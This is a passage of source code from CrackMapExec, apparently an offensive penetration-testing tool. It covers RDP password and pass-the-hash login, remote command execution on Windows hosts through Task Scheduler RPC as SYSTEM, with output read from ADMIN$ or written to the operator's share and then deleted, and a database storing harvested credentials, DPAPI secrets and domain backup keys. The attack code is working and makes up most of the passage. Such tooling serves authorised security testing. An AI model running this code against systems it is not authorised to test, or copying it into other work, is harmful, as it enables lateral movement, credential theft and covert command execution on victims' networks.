secret=password,
username=username,
domain=domain,
stype=asyauthSecret.PASS,
)
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
asyncio.run(self.connect_rdp())
self.admin_privs = True
self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
if not self.args.local_auth:
add_user_bh(username, domain, self.logger, self.config)
return True
except Exception as e:
if "Authentication failed!" in str(e):
self.logger.success(f"{domain}\\{username}:{process_secret(password)} {self.mark_pwned()}")
else:
reason = None
for word in self.rdp_error_status.keys():
if word in str(e):
reason = self.rdp_error_status[word]
if "cannot unpack non-iterable NoneType object" == str(e):
reason = "User valid but cannot connect"
self.logger.fail(
(f"{domain}\\{username}:{process_secret(password)} {f'({reason})' if reason else ''}"),
color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"),
)
return False
def hash_login(self, domain, username, ntlm_hash):
try:
self.auth = NTLMCredential(
secret=ntlm_hash,
username=username,
domain=domain,
stype=asyauthSecret.NT,
)
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
asyncio.run(self.connect_rdp())
self.admin_privs = True
self.logger.success(f"{self.domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
if not self.args.local_auth:
add_user_bh(username, domain, self.logger, self.config)
return True
except Exception as e:
if "Authentication failed!" in str(e):
self.logger.success(f"{domain}\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}")
else:
reason = None
for word in self.rdp_error_status.keys():
if word in str(e):
reason = self.rdp_error_status[word]
if "cannot unpack non-iterable NoneType object" == str(e):
reason = "User valid but cannot connect"
self.logger.fail(
(f"{domain}\\{username}:{process_secret(ntlm_hash)} {f'({reason})' if reason else ''}"),
color=("magenta" if ((reason or "CredSSP" in str(e)) and reason != "STATUS_LOGON_FAILURE") else "red"),
)
return False
async def screen(self):
try:
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
await self.connect_rdp()
except Exception as e:
return
await asyncio.sleep(int(5))
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)
filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png")
buffer.save(filename, "png")
self.logger.highlight(f"Screenshot saved {filename}")
def screenshot(self):
asyncio.run(self.screen())
async def nla_screen(self):
# Otherwise it crash
self.iosettings.supported_protocols = None
self.auth = NTLMCredential(secret="", username="", domain="", stype=asyauthSecret.PASS)
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
await self.connect_rdp()
await asyncio.sleep(int(self.args.screentime))
if self.conn is not None and self.conn.desktop_buffer_has_data is True:
buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)
filename = os.path.expanduser(f"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png")
buffer.save(filename, "png")
self.logger.highlight(f"NLA Screenshot saved {filename}")
def nla_screenshot(self):
if not self.nla:
asyncio.run(self.nla_screen())
================================================
FILE: cme/protocols/smb/__init__.py
================================================
================================================
FILE: cme/protocols/smb/atexec.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from impacket.dcerpc.v5 import tsch, transport
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from cme.helpers.misc import gen_random_string
from time import sleep
class TSCH_EXEC:
def __init__(
self,
target,
share_name,
username,
password,
domain,
doKerberos=False,
aesKey=None,
kdcHost=None,
hashes=None,
logger=None,
tries=None,
share=None
):
self.__target = target
self.__username = username
self.__password = password
self.__domain = domain
self.__share_name = share_name
self.__lmhash = ""
self.__nthash = ""
self.__outputBuffer = b""
self.__retOutput = False
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = kdcHost
self.__tries = tries
self.logger = logger
if hashes is not None:
# This checks to see if we didn't provide the LM Hash
if hashes.find(":") != -1:
self.__lmhash, self.__nthash = hashes.split(":")
else:
self.__nthash = hashes
if self.__password is None:
self.__password = ""
stringbinding = r"ncacn_np:%s[\pipe\atsvc]" % self.__target
self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
if hasattr(self.__rpctransport, "set_credentials"):
# This method exists only for selected protocol sequences.
self.__rpctransport.set_credentials(
self.__username,
self.__password,
self.__domain,
self.__lmhash,
self.__nthash,
self.__aesKey,
)
self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)
def execute(self, command, output=False):
self.__retOutput = output
self.execute_handler(command)
return self.__outputBuffer
def output_callback(self, data):
self.__outputBuffer = data
def gen_xml(self, command, tmpFileName, fileless=False):
xml = """
2015-07-15T20:35:13.2757294
true
1
S-1-5-18
HighestAvailable
IgnoreNew
false
false
true
false
true
false
true
true
true
false
false
P3D
7
cmd.exe
"""
if self.__retOutput:
if fileless:
local_ip = self.__rpctransport.get_socket().getsockname()[0]
argument_xml = f" /C {command} > \\\\{local_ip}\\{self.__share_name}\\{tmpFileName} 2>&1"
else:
argument_xml = f" /C {command} > %windir%\\Temp\\{tmpFileName} 2>&1"
elif self.__retOutput is False:
argument_xml = f" /C {command}"
self.logger.debug("Generated argument XML: " + argument_xml)
xml += argument_xml
xml += """
"""
return xml
def execute_handler(self, command, fileless=False):
dce = self.__rpctransport.get_dce_rpc()
if self.__doKerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.set_credentials(*self.__rpctransport.get_credentials())
dce.connect()
# dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
tmpName = gen_random_string(8)
tmpFileName = tmpName + ".tmp"
xml = self.gen_xml(command, tmpFileName, fileless)
self.logger.info(f"Task XML: {xml}")
taskCreated = False
self.logger.info(f"Creating task \\{tmpName}")
try:
# windows server 2003 has no MSRPC_UUID_TSCHS, if it bind, it will return abstract_syntax_not_supported
dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
dce.bind(tsch.MSRPC_UUID_TSCHS)
tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
except Exception as e:
if e.error_code and hex(e.error_code) == "0x80070005":
self.logger.fail("ATEXEC: Create schedule task got blocked.")
else:
self.logger.fail(str(e))
return
else:
taskCreated = True
self.logger.info(f"Running task \\{tmpName}")
tsch.hSchRpcRun(dce, f"\\{tmpName}")
done = False
while not done:
self.logger.debug(f"Calling SchRpcGetLastRunInfo for \\{tmpName}")
resp = tsch.hSchRpcGetLastRunInfo(dce, f"\\{tmpName}")
if resp["pLastRuntime"]["wYear"] != 0:
done = True
else:
sleep(2)
self.logger.info(f"Deleting task \\{tmpName}")
tsch.hSchRpcDelete(dce, f"\\{tmpName}")
taskCreated = False
if taskCreated is True:
tsch.hSchRpcDelete(dce, "\\%s" % tmpName)
if self.__retOutput:
if fileless:
while True:
try:
with open(os.path.join("/tmp", "cme_hosted", tmpFileName), "r") as output:
self.output_callback(output.read())
break
except IOError:
sleep(2)
else:
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
smbConnection = self.__rpctransport.get_smb_connection()
tries = 1
while True:
try:
self.logger.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}")
smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback)
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f'ATEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option "--get-output-tries". If it\'s still failing maybe something is blocking the schedule job, try another exec method')
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f'ATEXEC: Get ouput failed, target has blocked ADMIN$ access (maybe command executed!)')
break
if str(e).find("SHARING") > 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
sleep(3)
tries += 1
else:
self.logger.debug(str(e))
if self.__outputBuffer:
self.logger.debug(f"Deleting file ADMIN$\\Temp\\{tmpFileName}")
smbConnection.deleteFile("ADMIN$", f"Temp\\{tmpFileName}")
dce.disconnect()
================================================
FILE: cme/protocols/smb/database.py
================================================
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import base64
import warnings
from datetime import datetime
from pathlib import Path
from sqlalchemy import MetaData, func, Table, select, delete
from sqlalchemy.dialects.sqlite import Insert # used for upsert
from sqlalchemy.exc import (
IllegalStateChangeError,
NoInspectionAvailable,
NoSuchTableError,
)
from sqlalchemy.exc import SAWarning
from sqlalchemy.orm import sessionmaker, scoped_session
from cme.logger import cme_logger
# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings
warnings.filterwarnings("ignore", category=SAWarning)
class database:
def __init__(self, db_engine):
self.HostsTable = None
self.UsersTable = None
self.GroupsTable = None
self.SharesTable = None
self.AdminRelationsTable = None
self.GroupRelationsTable = None
self.LoggedinRelationsTable = None
self.ConfChecksTable = None
self.ConfChecksResultsTable = None
self.DpapiBackupkey = None
self.DpapiSecrets = None
self.db_engine = db_engine
self.db_path = self.db_engine.url.database
self.protocol = Path(self.db_path).stem.upper()
self.metadata = MetaData()
self.reflect_tables()
session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)
Session = scoped_session(session_factory)
# this is still named "conn" when it is the session object; TODO: rename
self.conn = Session()
@staticmethod
def db_schema(db_conn):
db_conn.execute(
"""CREATE TABLE "hosts" (
"id" integer PRIMARY KEY,
"ip" text,
"hostname" text,
"domain" text,
"os" text,
"dc" boolean,
"smbv1" boolean,
"signing" boolean,
"spooler" boolean,
"zerologon" boolean,
"petitpotam" boolean
)"""
)
db_conn.execute(
"""CREATE TABLE "conf_checks" (
"id" integer PRIMARY KEY,
"name" text,
"description" text
)"""
)
db_conn.execute(
"""CREATE TABLE "conf_checks_results" (
"id" integer PRIMARY KEY,
"host_id" integer,
"check_id" integer,
"secure" boolean,
"reasons" text,
FOREIGN KEY(host_id) REFERENCES hosts(id),
FOREIGN KEY(check_id) REFERENCES conf_checks(id)
)
"""
)
# type = hash, plaintext
db_conn.execute(
"""CREATE TABLE "users" (
"id" integer PRIMARY KEY,
"domain" text,
"username" text,
"password" text,
"credtype" text,
"pillaged_from_hostid" integer,
FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "groups" (
"id" integer PRIMARY KEY,
"domain" text,
"name" text,
"rid" text,
"member_count_ad" integer,
"last_query_time" text
)"""
)
# This table keeps track of which credential has admin access over which machine and vice-versa
db_conn.execute(
"""CREATE TABLE "admin_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"hostid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "group_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"groupid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(groupid) REFERENCES groups(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "shares" (
"id" integer PRIMARY KEY,
"hostid" text,
"userid" integer,
"name" text,
"remark" text,
"read" boolean,
"write" boolean,
FOREIGN KEY(userid) REFERENCES users(id)
UNIQUE(hostid, userid, name)
)"""
)
db_conn.execute(
"""CREATE TABLE "loggedin_relations" (
"id" integer PRIMARY KEY,
"userid" integer,
"hostid" integer,
FOREIGN KEY(userid) REFERENCES users(id),
FOREIGN KEY(hostid) REFERENCES hosts(id)
)"""
)
db_conn.execute(
"""CREATE TABLE "dpapi_secrets" (
"id" integer PRIMARY KEY,
"host" text,
"dpapi_type" text,
"windows_user" text,
"username" text,
"password" text,
"url" text,
UNIQUE(host, dpapi_type, windows_user, username, password, url)
)"""
)
db_conn.execute(
"""CREATE TABLE "dpapi_backupkey" (
"id" integer PRIMARY KEY,
"domain" text,
"pvk" text,
UNIQUE(domain)
)"""
)
# db_conn.execute('''CREATE TABLE "ntds_dumps" (
# "id" integer PRIMARY KEY,
# "hostid", integer,
# "domain" text,
# "username" text,
# "hash" text,
# FOREIGN KEY(hostid) REFERENCES hosts(id)
# )''')
def reflect_tables(self):
with self.db_engine.connect() as conn:
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
self.GroupsTable = Table("groups", self.metadata, autoload_with=self.db_engine)
self.SharesTable = Table("shares", self.metadata, autoload_with=self.db_engine)
self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine)
self.GroupRelationsTable = Table("group_relations", self.metadata, autoload_with=self.db_engine)
self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine)
self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine)
self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine)
self.ConfChecksTable = Table("conf_checks", self.metadata, autoload_with=self.db_engine)
self.ConfChecksResultsTable = Table("conf_checks_results", self.metadata, autoload_with=self.db_engine)
except (NoInspectionAvailable, NoSuchTableError):
print(
f"""
[-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch
[-] This is probably because a newer version of CME is being ran on an old DB schema
[-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)
[-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB"""
)
exit()
def shutdown_db(self):
try:
self.conn.close()
# due to the async nature of CME, sometimes session state is a bit messy and this will throw:
# Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and
# this would cause an unexpected state change to
except IllegalStateChangeError as e:
cme_logger.debug(f"Error while closing session db object: {e}")
def clear_database(self):
for table in self.metadata.sorted_tables:
self.conn.execute(table.delete())
# pull/545
def add_host(
self,
ip,
hostname,
domain,
os,
smbv1,
signing,
spooler=None,
zerologon=None,
petitpotam=None,
dc=None,
):
"""
Check if this host has already been added to the database, if not, add it in.
"""
hosts = []
updated_ids = []
q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)
results = self.conn.execute(q).all()
# create new host
if not results:
new_host = {
"ip": ip,
"hostname": hostname,
"domain": domain,
"os": os if os is not None else "",
"dc": dc,
"smbv1": smbv1,
"signing": signing,
"spooler": spooler,
"zerologon": zerologon,
"petitpotam": petitpotam,
}
hosts = [new_host]
# update existing hosts data
else:
for host in results:
host_data = host._asdict()
# only update column if it is being passed in
if ip is not None:
host_data["ip"] = ip
if hostname is not None:
host_data["hostname"] = hostname
if domain is not None:
host_data["domain"] = domain
if os is not None:
host_data["os"] = os
if smbv1 is not None:
host_data["smbv1"] = smbv1
if signing is not None:
host_data["signing"] = signing
if spooler is not None:
host_data["spooler"] = spooler
if zerologon is not None:
host_data["zerologon"] = zerologon
if petitpotam is not None:
host_data["petitpotam"] = petitpotam
if dc is not None:
host_data["dc"] = dc
# only add host to be updated if it has changed
if host_data not in hosts:
hosts.append(host_data)
updated_ids.append(host_data["id"])
cme_logger.debug(f"Update Hosts: {hosts}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)
self.conn.execute(q, hosts) # .scalar()
# we only return updated IDs for now - when RETURNING clause is allowed we can return inserted
if updated_ids:
cme_logger.debug(f"add_host() - Host IDs Updated: {updated_ids}")
return updated_ids
def add_credential(self, credtype, domain, username, password, group_id=None, pillaged_from=None):
"""
Check if this credential has already been added to the database, if not add it in.
"""
credentials = []
groups = []
if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)):
cme_logger.debug(f"Invalid group or host")
return
q = select(self.UsersTable).filter(
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
func.lower(self.UsersTable.c.credtype) == func.lower(credtype),
)
results = self.conn.execute(q).all()
# add new credential
if not results:
new_cred = {
"credtype": credtype,
"domain": domain,
"username": username,
"password": password,
"groupid": group_id,
"pillaged_from": pillaged_from,
}
credentials = [new_cred]
# update existing cred data
else:
for creds in results:
# this will include the id, so we don't touch it
cred_data = creds._asdict()
# only update column if it is being passed in
if credtype is not None:
cred_data["credtype"] = credtype
if domain is not None:
cred_data["domain"] = domain
if username is not None:
cred_data["username"] = username
if password is not None:
cred_data["password"] = password
if group_id is not None:
cred_data["groupid"] = group_id
groups.append({"userid": cred_data["id"], "groupid": group_id})
if pillaged_from is not None:
cred_data["pillaged_from"] = pillaged_from
# only add cred to be updated if it has changed
if cred_data not in credentials:
credentials.append(cred_data)
# TODO: find a way to abstract this away to a single Upsert call
q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id)
update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"}
q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users)
cme_logger.debug(f"Adding credentials: {credentials}")
self.conn.execute(q_users, credentials) # .scalar()
if groups:
q_groups = Insert(self.GroupRelationsTable)
self.conn.execute(q_groups, groups)
# return user_ids
def remove_credentials(self, creds_id):
"""
Removes a credential ID from the database
"""
del_hosts = []
for cred_id in creds_id:
q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)
del_hosts.append(q)
self.conn.execute(q)
def add_admin_user(self, credtype, domain, username, password, host, user_id=None):
add_links = []
creds_q = select(self.UsersTable)
if user_id:
creds_q = creds_q.filter(self.UsersTable.c.id == user_id)
else:
creds_q = creds_q.filter(
func.lower(self.UsersTable.c.credtype) == func.lower(credtype),
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
self.UsersTable.c.password == password,
)
users = self.conn.execute(creds_q)
hosts = self.get_hosts(host)
if users and hosts:
for user, host in zip(users, hosts):
user_id = user[0]
host_id = host[0]
link = {"userid": user_id, "hostid": host_id}
admin_relations_select = select(self.AdminRelationsTable).filter(
self.AdminRelationsTable.c.userid == user_id,
self.AdminRelationsTable.c.hostid == host_id,
)
links = self.conn.execute(admin_relations_select).all()
if not links:
add_links.append(link)
admin_relations_insert = Insert(self.AdminRelationsTable)
if add_links:
self.conn.execute(admin_relations_insert, add_links)
def get_admin_relations(self, user_id=None, host_id=None):
if user_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)
elif host_id:
q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)
else:
q = select(self.AdminRelationsTable)
results = self.conn.execute(q).all()
return results
def remove_admin_relation(self, user_ids=None, host_ids=None):
q = delete(self.AdminRelationsTable)
if user_ids:
for user_id in user_ids:
q = q.filter(self.AdminRelationsTable.c.userid == user_id)
elif host_ids:
for host_id in host_ids:
q = q.filter(self.AdminRelationsTable.c.hostid == host_id)
self.conn.execute(q)
def is_credential_valid(self, credential_id):
"""
Check if this credential ID is valid.
"""
q = select(self.UsersTable).filter(
self.UsersTable.c.id == credential_id,
self.UsersTable.c.password is not None,
)
results = self.conn.execute(q).all()
return len(results) > 0
def get_credentials(self, filter_term=None, cred_type=None):
"""
Return credentials from the database.
"""
# if we're returning a single credential by ID
if self.is_credential_valid(filter_term):
q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)
elif cred_type:
q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))
# otherwise return all credentials
else:
q = select(self.UsersTable)
results = self.conn.execute(q).all()
return results
def get_credential(self, cred_type, domain, username, password):
q = select(self.UsersTable).filter(
self.UsersTable.c.domain == domain,
self.UsersTable.c.username == username,
self.UsersTable.c.password == password,
self.UsersTable.c.credtype == cred_type,
)
results = self.conn.execute(q).first()
return results.id
def is_credential_local(self, credential_id):
q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id)
user_domain = self.conn.execute(q).all()
if user_domain:
q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain))
results = self.conn.execute(q).all()
return len(results) > 0
def is_host_valid(self, host_id):
"""
Check if this host ID is valid.
"""
q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)
results = self.conn.execute(q).all()
return len(results) > 0
def get_hosts(self, filter_term=None, domain=None):
"""
Return hosts from the database.
"""
q = select(self.HostsTable)
# if we're returning a single host by ID
if self.is_host_valid(filter_term):
q = q.filter(self.HostsTable.c.id == filter_term)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
# if we're filtering by domain controllers
elif filter_term == "dc":
q = q.filter(self.HostsTable.c.dc == True)
if domain:
q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))
elif filter_term == "signing":
# generally we want hosts that are vulnerable, so signing disabled
q = q.filter(self.HostsTable.c.signing == False)
elif filter_term == "spooler":
q = q.filter(self.HostsTable.c.spooler == True)
elif filter_term == "zerologon":
q = q.filter(self.HostsTable.c.zerologon == True)
elif filter_term == "petitpotam":
q = q.filter(self.HostsTable.c.petitpotam == True)
elif filter_term is not None and filter_term.startswith("domain"):
domain = filter_term.split()[1]
like_term = func.lower(f"%{domain}%")
q = q.filter(self.HostsTable.c.domain.like(like_term))
# if we're filtering by ip/hostname
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term))
results = self.conn.execute(q).all()
cme_logger.debug(f"smb hosts() - results: {results}")
return results
def is_group_valid(self, group_id):
"""
Check if this group ID is valid.
"""
q = select(self.GroupsTable).filter(self.GroupsTable.c.id == group_id)
results = self.conn.execute(q).first()
valid = True if results else False
cme_logger.debug(f"is_group_valid(groupID={group_id}) => {valid}")
return valid
def add_group(self, domain, name, rid=None, member_count_ad=None):
results = self.get_groups(group_name=name, group_domain=domain)
groups = []
updated_ids = []
group_data = {
"domain": domain,
"name": name,
"rid": rid,
"member_count_ad": member_count_ad,
"last_query_time": None,
}
if not results:
if member_count_ad is not None:
group_data["member_count_ad"] = member_count_ad
today = datetime.now()
iso_date = today.isoformat()
group_data["last_query_time"] = iso_date
groups = [group_data]
# insert the group and get the returned id right away, this can be refactored when we can use RETURNING
q = Insert(self.GroupsTable)
self.conn.execute(q, groups)
new_group_data = self.get_groups(group_name=group_data["name"], group_domain=group_data["domain"])
returned_id = [new_group_data[0].id]
cme_logger.debug(f"Inserted group with ID: {returned_id[0]}")
return returned_id
else:
for group in results:
g_data = group._asdict()
if domain is not None:
g_data["domain"] = domain
if name is not None:
g_data["name"] = name
if rid is not None:
g_data["rid"] = rid
if member_count_ad is not None:
g_data["member_count_ad"] = member_count_ad
today = datetime.now()
iso_date = today.isoformat()
g_data["last_query_time"] = iso_date
# only add it to the upsert query if it's changed to save query execution time
if g_data not in groups:
groups.append(g_data)
updated_ids.append(g_data["id"])
cme_logger.debug(f"Update Groups: {groups}")
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.GroupsTable) # .returning(self.GroupsTable.c.id)
update_columns = {col.name: col for col in q.excluded if col.name not in "id"}
q = q.on_conflict_do_update(index_elements=self.GroupsTable.primary_key, set_=update_columns)
self.conn.execute(q, groups)
# TODO: always return a list and fix code references to not expect a single integer
# inserted_result = res_inserted_result.first()
# gid = inserted_result.id
#
# logger.debug(f"inserted_results: {inserted_result}\ntype: {type(inserted_result)}")
# logger.debug('add_group(domain={}, name={}) => {}'.format(domain, name, gid))
if updated_ids:
cme_logger.debug(f"Updated groups with IDs: {updated_ids}")
return updated_ids
def get_groups(self, filter_term=None, group_name=None, group_domain=None):
"""
Return groups from the database
"""
if filter_term and self.is_group_valid(filter_term):
q = select(self.GroupsTable).filter(self.GroupsTable.c.id == filter_term)
results = self.conn.execute(q).first()
# all() returns a list, so we keep the return format the same so consumers don't have to guess
return [results]
elif group_name and group_domain:
q = select(self.GroupsTable).filter(
func.lower(self.GroupsTable.c.name) == func.lower(group_name),
func.lower(self.GroupsTable.c.domain) == func.lower(group_domain),
)
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = select(self.GroupsTable).filter(self.GroupsTable.c.name.like(like_term))
else:
q = select(self.GroupsTable).filter()
results = self.conn.execute(q).all()
cme_logger.debug(f"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}")
return results
def get_group_relations(self, user_id=None, group_id=None):
if user_id and group_id:
q = select(self.GroupRelationsTable).filter(
self.GroupRelationsTable.c.id == user_id,
self.GroupRelationsTable.c.groupid == group_id,
)
elif user_id:
q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.id == user_id)
elif group_id:
q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.groupid == group_id)
results = self.conn.execute(q).all()
return results
def remove_group_relations(self, user_id=None, group_id=None):
q = delete(self.GroupRelationsTable)
if user_id:
q = q.filter(self.GroupRelationsTable.c.userid == user_id)
elif group_id:
q = q.filter(self.GroupRelationsTable.c.groupid == group_id)
self.conn.execute(q)
def is_user_valid(self, user_id):
"""
Check if this User ID is valid.
"""
q = select(self.UsersTable).filter(self.UsersTable.c.id == user_id)
results = self.conn.execute(q).all()
return len(results) > 0
def get_users(self, filter_term=None):
q = select(self.UsersTable)
if self.is_user_valid(filter_term):
q = q.filter(self.UsersTable.c.id == filter_term)
# if we're filtering by username
elif filter_term and filter_term != "":
like_term = func.lower(f"%{filter_term}%")
q = q.filter(func.lower(self.UsersTable.c.username).like(like_term))
results = self.conn.execute(q).all()
return results
def get_user(self, domain, username):
q = select(self.UsersTable).filter(
func.lower(self.UsersTable.c.domain) == func.lower(domain),
func.lower(self.UsersTable.c.username) == func.lower(username),
)
results = self.conn.execute(q).all()
return results
def get_domain_controllers(self, domain=None):
return self.get_hosts(filter_term="dc", domain=domain)
def is_share_valid(self, share_id):
"""
Check if this share ID is valid.
"""
q = select(self.SharesTable).filter(self.SharesTable.c.id == share_id)
results = self.conn.execute(q).all()
cme_logger.debug(f"is_share_valid(shareID={share_id}) => {len(results) > 0}")
return len(results) > 0
def add_share(self, host_id, user_id, name, remark, read, write):
share_data = {
"hostid": host_id,
"userid": user_id,
"name": name,
"remark": remark,
"read": read,
"write": write,
}
share_id = self.conn.execute(
Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id),
share_data,
) # .scalar_one()
# return share_id
def get_shares(self, filter_term=None):
if self.is_share_valid(filter_term):
q = select(self.SharesTable).filter(self.SharesTable.c.id == filter_term)
elif filter_term:
like_term = func.lower(f"%{filter_term}%")
q = select(self.SharesTable).filter(self.SharesTable.c.name.like(like_term))
else:
q = select(self.SharesTable)
results = self.conn.execute(q).all()
return results
def get_shares_by_access(self, permissions, share_id=None):
permissions = permissions.lower()
q = select(self.SharesTable)
if share_id:
q = q.filter(self.SharesTable.c.id == share_id)
if "r" in permissions:
q = q.filter(self.SharesTable.c.read == 1)
if "w" in permissions:
q = q.filter(self.SharesTable.c.write == 1)
results = self.conn.execute(q).all()
return results
def get_users_with_share_access(self, host_id, share_name, permissions):
permissions = permissions.lower()
q = select(self.SharesTable.c.userid).filter(self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id)
if "r" in permissions:
q = q.filter(self.SharesTable.c.read == 1)
if "w" in permissions:
q = q.filter(self.SharesTable.c.write == 1)
results = self.conn.execute(q).all()
return results
def add_domain_backupkey(self, domain: str, pvk: bytes):
"""
Add domain backupkey
:domain is the domain fqdn
:pvk is the domain backupkey
"""
q = select(self.DpapiBackupkey).filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain))
results = self.conn.execute(q).all()
if not len(results):
pvk_encoded = base64.b64encode(pvk)
backup_key = {"domain": domain, "pvk": pvk_encoded}
try:
# TODO: find a way to abstract this away to a single Upsert call
q = Insert(self.DpapiBackupkey) # .returning(self.DpapiBackupkey.c.id)
self.conn.execute(q, [backup_key]) # .scalar()
cme_logger.debug(f"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})")
# return inserted_id
except Exception as e:
cme_logger.debug(f"Issue while inserting DPAPI Backup Key: {e}")
def get_domain_backupkey(self, domain: str = None):
"""
Get domain backupkey
:domain is the domain fqdn
"""
q = select(self.DpapiBackupkey)
if domain is not None:
q = q.filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain))
results = self.conn.execute(q).all()
cme_logger.debug(f"get_domain_backupkey(domain={domain}) => {results}")
if len(results) > 0:
results = [(id_key, domain, base64.b64decode(pvk)) for id_key, domain, pvk in results]
return results
def is_dpapi_secret_valid(self, dpapi_secret_id):
"""
Check if this group ID is valid.
:dpapi_secret_id is a primary id
"""
q = select(self.DpapiSecrets).filter(func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id)
results = self.conn.execute(q).first()
valid = True if results is not None else False
cme_logger.debug(f"is_dpapi_secret_valid(groupID={dpapi_secret_id}) => {valid}")
return valid
def add_dpapi_secrets(
self,
host: str,
dpapi_type: str,
windows_user: str,
username: str,
password: str,
url: str = "",
):
"""
Add dpapi secrets to cmedb
"""
secret = {
"host": host,
"dpapi_type": dpapi_type,
"windows_user": windows_user,
"username": username,
"password": password,
"url": url,
}
q = Insert(self.DpapiSecrets).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id)
self.conn.execute(q, [secret]) # .scalar()
# inserted_result = res_inserted_result.first()
